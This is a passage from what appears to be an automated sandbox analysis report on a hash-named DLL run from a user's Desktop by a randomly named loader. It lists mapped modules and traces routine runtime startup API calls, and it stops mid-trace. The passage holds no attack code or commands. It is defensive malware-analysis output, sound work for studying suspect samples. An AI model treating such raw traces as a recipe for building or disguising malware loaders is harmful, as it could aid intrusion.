= 1158 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1159 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1160 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1161 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1162 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1163 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1164 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1165 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1166 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1167 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1168 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1169 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1170 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1171 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1172 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1173 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1174 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1175 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1176 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1177 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1178 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1179 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1180 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1181 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1182 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1183 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1184 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1185 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1186 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1187 start_va = 0x270000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 2973 start_va = 0x760000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 2974 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Thread: id = 54 os_tid = 0xb74 [0032.604] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f95c | out: lpSystemTimeAsFileTime=0x26f95c*(dwLowDateTime=0xe12907b0, dwHighDateTime=0x1d3dfba)) [0032.604] GetCurrentProcessId () returned 0xb70 [0032.604] GetCurrentThreadId () returned 0xb74 [0032.604] GetTickCount () returned 0x174f0 [0032.604] QueryPerformanceCounter (in: lpPerformanceCount=0x26f954 | out: lpPerformanceCount=0x26f954*=364400013) returned 1 [0032.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.605] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.605] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.605] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.605] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.605] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.605] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.605] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.605] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.606] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.606] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.606] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.606] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.606] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.606] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.607] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.607] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.607] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.607] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.607] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.607] GetCurrentThreadId () returned 0xb74 [0032.607] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"1\"" [0032.607] GetEnvironmentStringsW () returned 0x3378a8* [0032.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x1009f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.607] FreeEnvironmentStringsW (penv=0x3378a8) returned 1 [0032.607] GetStartupInfoA (in: lpStartupInfo=0x26f8ac | out: lpStartupInfo=0x26f8ac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.608] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.608] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.608] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.608] SetHandleCount (uNumber=0x20) returned 0x20 [0032.608] GetLastError () returned 0x0 [0032.608] SetLastError (dwErrCode=0x0) [0032.608] GetLastError () returned 0x0 [0032.608] SetLastError (dwErrCode=0x0) [0032.608] GetLastError () returned 0x0 [0032.608] SetLastError (dwErrCode=0x0) [0032.608] GetACP () returned 0x4e4 [0032.608] GetLastError () returned 0x0 [0032.608] SetLastError (dwErrCode=0x0) [0032.608] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.608] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f88c | out: lpCPInfo=0x26f88c) returned 1 [0032.608] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x26f358 | out: lpCPInfo=0x26f358) returned 1 [0032.608] GetLastError () returned 0x0 [0032.608] SetLastError (dwErrCode=0x0) [0032.608] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x26f2e8 | out: lpCharType=0x26f2e8) returned 1 [0032.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f76c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f76c, cbMultiByte=256, lpWideCharStr=0x26f0d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0032.608] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x26f36c | out: lpCharType=0x26f36c) returned 1 [0032.608] GetLastError () returned 0x0 [0032.608] SetLastError (dwErrCode=0x0) [0032.608] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f76c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.608] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f76c, cbMultiByte=256, lpWideCharStr=0x26f0a8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.608] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.608] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26ee98, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.608] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x26f66c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x83ppô¤ø&", lpUsedDefaultChar=0x0) returned 256 [0032.608] GetLastError () returned 0x0 [0032.609] SetLastError (dwErrCode=0x0) [0032.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f76c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.609] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x26f76c, cbMultiByte=256, lpWideCharStr=0x26f0c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.609] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.609] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x26eeb8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.609] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x26f56c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x83ppô¤ø&", lpUsedDefaultChar=0x0) returned 256 [0032.609] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.609] GetLastError () returned 0x0 [0032.609] SetLastError (dwErrCode=0x0) [0032.609] GetLastError () returned 0x0 [0032.609] SetLastError (dwErrCode=0x0) [0032.609] GetLastError () returned 0x0 [0032.609] SetLastError (dwErrCode=0x0) [0032.609] GetLastError () returned 0x0 [0032.609] SetLastError (dwErrCode=0x0) [0032.609] GetLastError () returned 0x0 [0032.609] SetLastError (dwErrCode=0x0) [0032.609] GetLastError () returned 0x0 [0032.609] SetLastError 